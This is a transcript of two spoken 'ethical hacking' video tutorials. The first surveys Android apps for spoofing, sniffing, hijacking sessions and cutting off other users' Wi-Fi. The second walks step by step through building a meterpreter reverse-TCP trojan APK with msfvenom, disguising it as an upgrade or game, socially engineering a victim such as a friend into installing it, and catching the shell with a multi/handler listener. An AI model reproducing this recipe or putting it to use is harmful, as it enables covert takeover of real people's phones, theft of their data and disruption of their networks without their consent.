Hey guys, and welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in the previous tutorials I taught you about hacking a Windows machine and other different types of Trojans and how we can go ahead and do DDoS attacks on multiple machines by doing a distributed denial of service attack or just a denial of service attack. I also taught you as to how I can go ahead and actually, after penetrating a computer, how I can actually go ahead and run, let's say, a DDoS file from his computer, or I can just do it without even accessing his computer. I can just go ahead and send him a link, and as soon as he clicks on that link, boom, his computer will totally stop responding, and he will have to actually unplug the computer because everything, the keyboard, the mouse, and even its processor, everything will stop working, and it will go ahead and create an infinite loop in the background which will make the computer stop working. It will not even give the user a second's time to go ahead and make any kind of changes, or because as soon as he clicks this link, he won't even be able to move his mouse and everything will be stopped. So we saw all of those things in the previous tutorials. But let's do something different this time. We will be, in this tutorial, we will be taking a look as to how we can actually go ahead and hack into an Android and hack a computer using an Android. And as you know that Android is the main platform for that is Java, and it's mostly or almost a type of Linux, and if you have ever used a terminal in Android, I'll just go ahead and show you some specific apps that I have been going through. So if you terminal emulator Android, you can go on the Google Play Store, and there are different applications through which you could go ahead and run this kind of specific terminal on your Android. You can just run the terminal emulator, or there is one more, I don't remember exactly. Yeah, terminal IDE. Perfect. So these are the two most awesome terminals that you could run on your Android. And if you have let's say if you have a rooted phone, and in case you don't know what root is actually gaining administrative rights, or not even administrative, the system rights to a phone. Normally when you get a phone, you only have let's say I can say as you only have the user rights. When, let's say for example, when you go ahead and open your Windows system, you can either go and get your system rights or the user rights. So similarly, when you purchase a new phone, you normally go ahead and get only the user rights. You don't have the administrative rights, so you cannot go ahead and actually uninstall the system files. So you can go to your you put your website, your cell phone name. For example, mine is Nexus 5, so you can type Nexus 5 root, and you can type XDA, and XDA is a website where you can get a root for any kind of cell phone. Almost all cell phones you will find all types of root over here. So this XDA specific website, this is a forum where you can get any kind of websites and tools that you need. Not websites, sorry, you can get any kind of let's say mods that you need for your cell phone. And right now I'll be showing you different tools through which you could go ahead and hack into another person's cell phone, or you could go ahead and actually hack into another person's network, and it can also go ahead and lead to how anyone else can go ahead and access your network as well. So besides these apps, if you are running it as a root, then it's awesome, and it will also find similar. And if you're using Nexus 5 or Nexus 7, Nexus 8, Nexus 9, it doesn't matter which one, you can also go ahead and download the Kali Linux for Nexus. And because it works only on Nexus and OnePlus 1, it will also work on other let's say other phones as well, such as Note 2, Note 3, but it may not work that good, and some modules may not work. So if you have Nexus series, then you can go ahead and download NetHunter version of Kali Linux, and this is the Kali Linux version for NetHunter. You can go ahead and download this specific thing for your it starts from Nexus 4 to Nexus 10, and it also has it also supports OnePlus 1 as well. So as you can see, NetHunter runs on chroot environment on Android device. So if you start a system via Android application, blah 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 and all these things, so you can go and run this all by yourself, but you need a rooted phone for this, else it will not work. And it has HID keyboard, that's Tinsy keyboard, bad USB man in the middle attacks, and one-click mana evil access point. There's nothing better you can get instead of this. It also has a 802.11 frame injection, and which supports variety of USB and ICs. That means you can also connect your own USB router to your cell phone, and you can run these things. So this is a lot of fancy stuff, and if you don't have that much knowledge of actually going ahead and running this on your cell phone, then I can also show you different tools that you don't need to go and install the Kali Linux Net Hunter if you have other cell phones or normal cell phone, any random cell phone with at least a minimum of 512 MB of RAM, or if you have rooted it, then it's more than enough. So I'll show you different applications which you could use to go ahead and use it for your penetration testing. So the first thing would be a terminal emulator, as I showed you, and the terminal IDE. IDE normally takes up a good amount of space, and we also have the SSH option to go ahead and so that let me check which one was it exactly. I believe it was, let me check. I believe we can also go ahead and connect through terminal IDE, but I use, yeah, SSH Droid, perfect. So this one I was searching for. You can use SSH Droid to go ahead and securely connect any of your, don't just ignore this one, because this ratings are given by people who cannot actually use this. So you can also use the SSH Droid to connect to your cell phone or your computer. It may be Linux or Windows securely. This is another tool through which you can go ahead and securely connect to any of your remote machines. Then we have the DSploit, which is now Xanti2, but I don't actually like the Xanti2, so I would be again, as you can see, DSploit merges with Xanti2, but still you will be able to find the DSploit version over here. Save browsing, continue information. Okay, how can I go ahead and, okay, maybe due to my computer's limitations I won't be able to access this page, and yes. Just ignore this part, and actually you can go ahead and go through. I'll just go ahead and remove the S version, and I'll just try to, perfect, it won't work. Perfect. Details, visit this unsafe site. Perfect. So you can either download the DSploit APK from anywhere over here. I have been using that since a long time, and it's a good application, and it also works offline. That means if you are even connected to Wi-Fi, and if you don't even have the access on the Wi-Fi on the person's Wi-Fi, then it will still work. That means you can still disrupt the person's Wi-Fi service. But Xanti is also good. That's Zimperium Xanti2. You can do different types of man-in-the-middle attacks, port scanning, but you need to go ahead and log in, and it's not, you can say, it will not make you anonymous at any point of time. That's the reason I don't like Xanti2. But the features that it has, if you're a penetration tester and if you're not looking for going anonymous on this specific thing, then Xanti2 is for you. It has all the features and even better features than DSploit. So after DSploit, we have Network Spoofer, which is also a very good application. And you can download Network Spoofer from over here. This is the original website. We can go ahead and create a fake, let's say, for example, the better way to tell you this would be, let me rephrase this. Network Spoofer goes ahead and spoof the person's specific IP addresses, the MAC ID, and all this stuff. It can all go ahead and do multiple spoof. Let's say, for example, if you're already in someone's computer. Let's say, for example, I'm using this computer through Wi-Fi, and someone else is also have the access to my Wi-Fi who is using this network spoofer. He can go ahead and run multiple spoofs at one time. He can go ahead and redirect all my traffic to somewhere else. He can go ahead and hijack my session, my YouTube session, Facebook session, and let's say, for example, if I'm viewing this network spoofer specific thing on my computer, and the person who is actually using network spoofer, he can replace all these specific terms to something else, such as troll. So whenever I see network spoofer, I'll see only troll written everywhere. He can go ahead and delete random words from these websites. So if I go ahead and click this specific website, I won't even see many things from this website. Or if you go ahead and delete solution, then wherever there is written solution in this web page, it will disappear. He can go ahead and flip images, flip tiles, reverse different types of title, troll face. He can send that to, or he can even go ahead and do different types of man-in-the-middle attacks, such as running it passively so that we won't be able to detect, or waiting for the Wi-Fi connection and then DDoSing it and gaining access to that. So this is another version of different type of attack that you can go ahead and run through the network spoofer. After that, after network spoofer, we have the Wi-Fi analyzer, which is a very great tool. If you're an Android user, then you can go ahead and download the, go ahead and purchase the Wi-Fi Spectrum Analyzer. And actually this was for the iOS. Let me check. It only supported iOS. Yeah, Wi-Spy, perfect. Okay, yep, it is Wi-Fi. So Wi-Fi is a specific device that only connects to iPhone, through which you can go and detect any kind of network activity going on near you. Let's say through Bluetooth connections, or let's say through data transferring through Wi-Fi, or any other thing, any random thing, it will go ahead and detect it. So this is one port, but we are not looking into iOS. So if you only want to go ahead and analyze the Wi-Fi, then I have Wi-Fi Analyzer for you, and you can go and download it from over here. It will show you from where exactly what exactly is the speed of the specific Wi-Fi, and which has the highest speed or the highest connection near you. So you may think that, okay, what's the big deal in that, because I can also go ahead and see that on my Wi-Fi connection inside my phone how much speed I'm getting. But the thing is that it shows you the exact thing which you will not be able to see on your normal Wi-Fi. And you can go ahead and detect exactly where the network connection is, and you can go ahead and actually search where the exact network is coming from. So that's what this Wi-Fi does. And finally we have the Wi-Fi kill, and you can go ahead and download it from over here, or this is the official website, that's paranoid.me for Wi-Fi. This is the version for Wi-Fi downloader. What this does is that it actually goes ahead, and I'll just go ahead and show you the image for that. Okay, this is how it looks like. It can go ahead and it searches all the IP address and MAC IDs of specific computers that are there on the LAN, and you can go ahead and stop transferring data to any of the specific computer that you want. You don't need to actually go ahead and know which exactly computer they are or which network they are. You can go ahead and stop, be anyone who is actually accessing through iPhone or Linux or through any kind of, it doesn't matter which system they are using. Any device they're using to go ahead and access the web, you can go ahead and stop their internet just by one click through Wi-Fi kill. And you don't even have to need to know much information about networking or any other thing. The start of Wi-Fi kill, but you need to have root access to run all of these things, else you won't be able to run these things. So the first thing that you would need to do would be to go ahead and root your Android. So you can also find different, we also have Wireshark, and for Play Store, which has a different name, I believe. Yeah, it has, the name is Interceptor NG, that we have on Play Store, that you can go ahead and sniff different traffics on the Wi-Fi. Then we have, let's say, Shark for root, that can also do the same thing, for that can ping different things and dump different packets on the Wireshark. So this way you can also go ahead and search for a lot of things. I have shown you the important parts that can be used, the applications that can be used through Android to hack into a system or trace or sniff their Wi-Fi stuff. So that is it for this tutorial, guys. In the next tutorial I'll be teaching you how we can go ahead and hack into a Android system rather than hacking from an Android system, and we would be using Kali Linux for doing these things. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in the previous tutorial I taught you about the different applications we could use to go ahead and sniff, hack and DOS a specific router or any other machine through a cell phone, and how we could also go ahead and use Kali Linux on our own cell phone. So but that's not it. Even though the Android is based on Linux, it is still insecure. And when I say insecure, it means any person can go ahead and let's say make you, or let's say for example, I'm not getting the exact term over here. Okay, he can actually go ahead and fool you into downloading something and running it as an application, but when you actually go ahead and run that, you could see that it is not the exact application, and finally your system will be hacked. So I'll just go ahead and start it over here, and I'll be going ahead and hacking. I'll be teaching us how we can go ahead and hack into the specific Android system, may it be Lollipop or Jelly Bean, or it doesn't matter which one you're using. It works on almost everyone as far as I have checked on Google Galaxy Nexus 5, Nexus 4, Nexus 6 as well. I have also used it on the Note 3, Note 4, Xperia Z, Z2 and different versions of the Micromax cell phones as well. So let's go ahead and I'll teach you as to how you can do that. I don't have any cell phone at this point of time, but I'll be showing you exactly how it works so that it will be easier for you to understand. And for this specific thing to run, the unknown sources must be ticked. I'll just show you. how it looks like. The unknown sources must be ticked on the computer's on the person's cell phone, so that our application run, else it will not run. As you can see, the when you go into settings, unknown sources should be ticked. Most probably nowadays people already have these sources ticked, but if not, then if you need to go ahead and social engineer your way to go ahead and make your target tick this specific thing in order for you to go ahead and install that app. Perfect. So this is a tutorial explaining how to go ahead and hack Android phones with Kali Linux, and the first thing that we would need to do would be to go ahead and fire up our Kali Linux. So once we have this, I need to go ahead and make a Trojan period APK file, and you can go ahead and do this by typing msf payload or msf venom space Android. Let me check if the payload is still working. Okay, payload is still working, but I believe that has been deprecated. Let me check. Yes, payload is deprecated, so we will be using msf venom instead, and type android / meterpreter / reverse underscore tcp lhost equals to, write down your own IP address, and for me it would be, just type ifconfig, and I'll just copy this and paste it over here, and I'll type /root /upgrader period APK, and just replace the host with your own IP address. You can also hack Android on WAN, that is wireless area network, that is through internet, by using public or external IP in your lhost or your local host, and by port forwarding. And you can go ahead and see port forwarding in one of my previous tutorials. I won't be teaching you that. And just hit enter. Let's wait till this gets completed. So I believe upgrader.apk should be created in my home directory. Yes, perfect. So I have this upgrader period APK. So this specific file, I need to go ahead and send this to my target's machine, and just open another terminal, and we need to go ahead and start our MSF console, so that as soon as the person goes ahead and install this, we will get a meterpreter session opened over here, that we could go ahead and use our root or directory to go ahead and do anything that we want in the person's Android cell phone. So just type MSF console over here, and it will start the MSF console. Let's wait till that happens. Okay, so we have our MSF console up and running, and now what we need to do is that we need to go ahead and set up a listener. So, and we need to go ahead and load the multi-handler exploit, so that as soon as the person starts, our listener will already be on, and we will already go ahead and get a reverse TCP connection over here. And as you see, if you see it properly over here, what I did was that I created a reverse TCP connection over here. So by doing that, whatever the person, okay, sorry, I think this upgrader has a problem. I'll just delete that, and I'll create a new one because there was a spelling mistake. It should be reverse TCP. Perfect. Okay, as you can see, my new file has been created. I believe it's under construction. Yep, 0 bytes. Perfect. So I have this upgrader period APK that I need to send this to my target, and before I send it, I need to go ahead and set up the listener, so that as soon as the person installs, I will have the listener ready to fire up. And so I could go ahead and do that by typing use exploit / multi / handler, and I'll hit enter, and a multi-handler will be started. So now we need to go ahead and set up a payload by typing set payload Android, because this multi-handler will be can be for anything, Linux, Windows, or any other operating system. So we need to set this specifically for Android. So we need to type set payload Android / meterpreter / reverse underscore TCP, and I'll just go ahead and hit enter, and it has been set. The payload is set to meterpreter Android reverse TCP. Now we need to go ahead and set our local host. So I'll just type lhost and go ahead and type your IP address, and I'll just go ahead and, okay, I mistakenly opened the iceweasel. Let me just close it first, and I'll type ifconfig, copy it and paste it over here. So this will be my local host where the connection would be coming in back. And if you are going ahead and hacking this specific Android on a wireless network that is on, let's say for example, like as of now I am going ahead and using this on a VMware, and if I'm going to go ahead and hack on a wireless network, not on a LAN, and when I say LAN I mean by a wireless Wi-Fi network, if your Android is not on a Wi-Fi network, then you need to go ahead and use your actual IP address that would be over here. Okay, Windows system 32, and I'll just go ahead and run. Perfect. So this would be the IP address that I would be needing to set over here, and as of now I will be assuming that we are on a local area network, so I am using the internal IP address. If you're not on local area network, then if you're on you hacking someone through internet, then you need to go ahead and use the IPv4 and then port forward your this specific thing to over here. And in order to port forward, you can go ahead and see whether it's selected. You can type it's okay. You can type this and see whether your port is forwarded. If not, then you can go ahead and specifically port forward by go ahead and editing it by typing NANO. It will open this specific port forward file in Nano Editor, and just change this 0 to 1. Type Control X. It will ask you whether you want to save. Type Y and enter, perfect. And again go ahead and see whether yes, perfect, it's 1. That means its port forwarding is on. So I'll just minimize this for the time being, and this would be my IP address. I have forwarded this port, so I'll just go ahead and hit enter. So I have set up the L host, and at the last type, now we need to go ahead and exploit to start the listener. So just go ahead and copy this application file to your root directory of your Android phone, and when I say root I mean your internal SD card, or go ahead and send it to any specific person using a Dropbox or uploading to any sharing website like SpeedyShare by renaming it to any game APK file or something, and send this link to that website. We'll go ahead and download it to your friend's phone or exploit their phones through this. And it should be only on LAN, but if you're using a WAN method, then you can use the exploit anywhere on internet. And you need to include something. If you are sending it through email, you need to something in the email telling them how to actually enable these unknown sources. Most phones nowadays already have these enabled by default. And let the victim install this upgrader period APK, as he would think it is meant to upgrade his file, some new features on his phone. However, the option of allowance for installation of apps from unknown sources should be enabled. If not, and as soon as he goes ahead and runs this specific file, I can go ahead and type sessions-l. And as of now, there are no active sessions because I have not yet started this on my specific cell phone. But if I had installed this, then I can go ahead and straight away install this specific thing on my cell phone, and my Meterpreter session will be open. And while you used to have to start the listener with the private IP address because it tells the listener that which PC is in network, we will be using our internal IP address as of now. If you are using trying it for WAN, then you need to go ahead and use the external IP address, and make sure that the port that you would be using would be 4444 or 8080. That would be in Kali's internal IP, Kali's. And the service type will be TCP or UDP. If you're using VMware, then you need to make sure that you switch off your antivirus firewall so that it will allow the connections to the VMware virus. That's it. And another solution that be if you have the default DMZ option, enable it in the Kali Linux. This will forward all the ports. Also, this won't open the ports, but it will only forward, and it will only forward them. So if you are testing something for port open services, they will tell you where the ports are closed, so you don't need to worry that someone can go ahead and gain access to your computer. So that's it for this tutorial, and I have already taught you how we can go ahead and access into any of our target's computer as well as their phone. So that's it for the basic Android and hacking stuff with Kali Linux. And in the next tutorial, which I would be starting from next time onwards, that would be the advanced Kali Linux. I would be teaching you everything in detail as to how we can go ahead and use these Hydra, Burp Suite, John to go ahead and crack different network things, SQL mapping, and that would be lots of other stuff, and it would be much more in detail. But you need to know all of these things in detail, in specific, so that you exactly know what we are doing, because if you go ahead and straight away jump to my next tutorial, you won't be able to understand a bit, and you need to go ahead and have these basic things done already. So that's it guys for this tutorial. Have a nice day ahead. See you later. Bye.